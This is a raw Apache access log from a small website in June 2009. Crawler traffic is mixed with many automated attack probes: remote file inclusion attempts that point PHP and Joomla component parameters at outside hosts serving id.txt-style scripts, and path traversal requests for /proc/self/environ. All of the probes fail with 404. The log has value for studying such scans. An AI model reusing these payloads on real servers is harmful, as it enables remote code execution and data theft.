217.169.210.130 - - [12/Jun/2009:21:16:07 -0700] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:21:16:08 -0700] "GET /logs//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:21:16:25 -0700] "GET /logs/access_071012.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:21:21:21 -0700] "GET /clipart/pageHeaders/?N=D HTTP/1.0" 200 691 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.80.195.37 - - [12/Jun/2009:21:25:02 -0700] "GET / HTTP/1.0" 200 9405 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.0.3705; Media Center PC 2.8; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)" "projectpr.com"
151.1.154.24 - - [12/Jun/2009:22:01:31 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [12/Jun/2009:22:01:32 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [12/Jun/2009:22:01:32 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [12/Jun/2009:22:02:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [12/Jun/2009:22:08:26 -0700] "GET /logs/access_071012.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:33 -0700] "GET /logs/access_070912.log//calendar.php?s=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:33 -0700] "GET /calendar.php?s=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:33 -0700] "GET /logs//calendar.php?s=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:34 -0700] "GET /logs/access_070912.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:34 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:34 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:34 -0700] "GET /logs/access_070912.log//calendar.php?s=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:34 -0700] "GET /logs//calendar.php?s=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:34 -0700] "GET /calendar.php?s=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:34 -0700] "GET /logs//calendar.php?s=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:35 -0700] "GET /logs/access_070912.log//calendar.php?s=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
62.149.163.198 - - [12/Jun/2009:22:08:35 -0700] "GET /calendar.php?s=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:22:15:17 -0700] "GET /logs/access_070812.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:22:15:20 -0700] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:22:15:21 -0700] "GET /logs//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:22:18:52 -0700] "GET /logs/access_071212.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.125.38.117 - - [12/Jun/2009:22:21:45 -0700] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.125.38.117 - - [12/Jun/2009:22:21:45 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.125.38.117 - - [12/Jun/2009:22:21:46 -0700] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:34:56 -0700] "GET /logs/access_070812.log/components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:34:56 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:35:13 -0700] "GET /logs/access_071012.log/components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:35:25 -0700] "GET /logs/access_070812.log/components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:35:25 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:35:26 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:35:44 -0700] "GET /logs/access_071012.log/components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:22:38:39 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.brk-forum.de/files/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.9.3.10 - - [12/Jun/2009:22:39:23 -0700] "GET /logs/access_070812.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.slickbar.co.id//images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.9.3.10 - - [12/Jun/2009:22:39:23 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.slickbar.co.id//images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.9.3.10 - - [12/Jun/2009:22:39:24 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.slickbar.co.id//images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.9.3.10 - - [12/Jun/2009:22:40:49 -0700] "GET /logs/access_071212.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.slickbar.co.id//images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:22:42:49 -0700] "GET /logs/access_071012.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:22:42:50 -0700] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:22:42:50 -0700] "GET /logs//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
195.9.3.10 - - [12/Jun/2009:22:45:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.slickbar.co.id//images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:22:51:27 -0700] "GET /clipart/ HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:22:54:54 -0700] "GET /clipart/?N=D HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
64.88.164.198 - - [12/Jun/2009:22:59:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "SapphireWebCrawler/1.0 (Sapphire Web Crawler using Nutch; http://boston.lti.cs.cmu.edu/crawler/; mhoy@cs.cmu.edu)" "www.projectpr.com"
64.88.164.198 - - [12/Jun/2009:22:59:39 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "-" "SapphireWebCrawler/1.0 (Sapphire Web Crawler using Nutch; http://boston.lti.cs.cmu.edu/crawler/; mhoy@cs.cmu.edu)" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:23:02:45 -0700] "GET /clipart/buttons/ HTTP/1.0" 200 670 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
209.62.42.51 - - [12/Jun/2009:23:06:05 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [12/Jun/2009:23:06:05 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [12/Jun/2009:23:06:05 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [12/Jun/2009:23:06:13 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [12/Jun/2009:23:08:29 -0700] "GET /logs/access_071012.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:09:56 -0700] "GET /include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:09:56 -0700] "GET /logs/access_070912.log%20%20//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:09:56 -0700] "GET /logs//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:10:03 -0700] "GET /include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:10:03 -0700] "GET /logs//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:10:03 -0700] "GET /logs/access_070912.log%20%20//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:10:50 -0700] "GET /logs/access_071012.log%20%20//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:11:09 -0700] "GET /logs/access_071012.log%20%20//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:23:12:40 -0700] "GET /clipart/buttons/?S=A HTTP/1.0" 200 670 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
213.192.241.94 - - [12/Jun/2009:23:16:02 -0700] "GET /logs/access_071212.log//index.php?pagina=http://www.eyepro.net//assets/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.192.241.94 - - [12/Jun/2009:23:16:03 -0700] "GET /index.php?pagina=http://www.eyepro.net//assets/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.192.241.94 - - [12/Jun/2009:23:16:04 -0700] "GET /logs//index.php?pagina=http://www.eyepro.net//assets/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:17:47 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:18:12 -0700] "GET /logs/access_071012.log//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:21:52 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:22:18 -0700] "GET /logs/access_071012.log//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:26:24 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:26:25 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:26:25 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:26:49 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:26:49 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:26:55 -0700] "GET /logs/access_071012.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:27:34 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:27:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:27:38 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:27:39 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:27:39 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:27:44 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:23:27:53 -0700] "GET /clipart/pageHeaders/ HTTP/1.0" 200 691 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:28:42 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:28:42 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:28:42 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:28:54 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:28:54 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:28:55 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:29:34 -0700] "GET /logs/access_071012.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:29:52 -0700] "GET /logs/access_071012.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:30:18 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:30:18 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:30:18 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:31:30 -0700] "GET /logs/access_070912.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:31:38 -0700] "GET /logs/access_070912.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:23:34:22 -0700] "GET /logs/access_070912.log//newspublish/include.php?path%5Bdocroot%5D=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:36:12 -0700] "GET /logs/access_070912.log//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
65.23.158.226 - - [12/Jun/2009:23:38:09 -0700] "GET /logs/access_070912.log//newspublish/include.php?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [12/Jun/2009:23:52:19 -0700] "GET /logs/access_071212.log%20%20//skin/zero_vote/error.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [12/Jun/2009:23:52:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [12/Jun/2009:23:52:19 -0700] "GET /skin/zero_vote/error.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [12/Jun/2009:23:57:40 -0700] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:17:21 -0700] "GET /logs/access_071212.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:17:22 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:17:59 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:20:44 -0700] "GET /logs/access_071212.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:20:44 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:20:45 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:29:06 -0700] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.6.15.41 - - [13/Jun/2009:00:37:37 -0700] "GET /include/bbs.lib.inc.php?site_path=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [13/Jun/2009:00:37:37 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [13/Jun/2009:00:37:37 -0700] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:00:40:02 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:00:40:02 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:00:40:10 -0700] "GET /include/bbs.lib.inc.php?site_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:00:40:10 -0700] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:00:40:10 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
